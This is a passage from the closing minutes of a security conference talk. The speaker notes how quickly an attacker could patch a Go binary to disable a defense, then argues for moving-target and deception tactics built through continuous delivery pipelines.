symbols for everything, so I think modifying a go binary to tell it not to do a thing is like probably about 20 minutes in P-trace, and if you use a little more advanced tools, it's like five. So that's, we're not there yet. I mean, as an industry also at that level, but I think one of the benefits of the cloud and kind of more nimble infrastructure is that you can, being able to just tear things down and restart and build sort of more some evasion-ness, some deception into your infrastructure makes it really hard for the attacker in that infrastructure. And so that they can't just download a piece of open source software and figure out how it works and where the knobs to turn because when they say, oh, you're running this piece of software, I know how to disable that. It's like, okay, cool, well, the binary image is totally different. So try and find that piece in my environment, it's a little different. So there's a lot of things that you can do. And once you have, like one of the things I realized with continuous build pipelines is it lets you do a whole lot of cool stuff. And when you have a continuous delivery pipeline, a continuous security pipeline, you basically don't have to set it and forget it and get hacked. You can do a lot of cool, a lot of fun stuff. So I don't wanna give away all of my ideas just yet, stay tuned. Any more? Okay, cool. All right, I'm gonna let you all go. If there's any questions, come up. Thank you for staying, thank you for coming.